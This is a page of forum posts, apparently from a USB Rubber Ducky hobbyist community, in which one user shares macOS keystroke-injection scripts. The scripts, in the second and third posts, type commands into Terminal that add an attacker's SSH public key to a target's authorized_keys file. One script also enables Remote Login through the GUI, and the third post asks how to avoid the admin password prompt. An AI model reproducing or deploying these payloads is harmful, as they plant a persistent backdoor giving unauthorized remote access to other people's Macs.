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Everything posted by ESC

  1. my ducky has been working great till today when i wrote a new script and transferred it to the SD swapped it out and plugged in the ducky to test and nothing happend.. no lights nothing... im on Mac OSX..is there any trouble shooting i can do on mac? my kali box is down at the moment.
  2. This is just an addon to an older script. I added in the enabling of remote login, first i had to enable the keyboard shortcuts so that you could do that. I also create the ssh directories and the proper permissions for them. Eventually im going install the twin duck firmware and grab some ip and username info as well let me know what you think and if you can think of improvements REM Replace 'ssh-rsa' with your public key and have fun REM code by ESC DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING mkdir ~/.ssh/ DELAY 30 ENTER STRING chmod 700 ~/.ssh DELAY 30 ENTER STRING echo 'ssh-rsa' >> ~/.ssh/authorized_keys DELAY 1500 ENTER STRING chmod 600 ~/.ssh/authorized_keys ENTER DELAY 100 STRING killall Terminal ENTER CONTROL F7 COMMAND SPACE DELAY 100 STRING remote login DELAY 100 ENTER DELAY 75 TAB TAB SPACE COMMAND Q
  3. Hey guys trying to set up a payload for putting the rsa key on a machine and enabling the ssh server. If i try and do it using the terminal it needs sudo and an admin password but if you do it through the gui in system preferences>sharing>remote login it doesn require a password. does anyone know an option that can get me around this? thanks! my current code is bassed on they passwordless ssh code by Jesse Wallace, i added some things that i found to be nessessary like the directory creation and the permissions REM Title: OS X Get SSH access REM Author: Jesse Wallace (c0deous) REM This script adds a ssh public key to the authorized_keys file on a target's mac. DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING mkdir ~/.ssh/ DELAY 30 ENTER STRING chmod 700 ~/.ssh DELAY 30 ENTER STRING echo 'ssh-key' > ~/.ssh/authorized_keys DELAY 1500 ENTER STRING chmod 600 ~/.ssh/authorized_keys ENTER DELAY 100 STRING killall Terminal ENTER REM Note: you may shorten the times if you think they are too slow. I made them to accomodate older macs that can't get around very fast. also strange side note the payload works great as is but for some reason on one (of three) of my macs it quits typing the line 'ssh-key' > ~/.ssh/authorized_keys after 'ssh-key'
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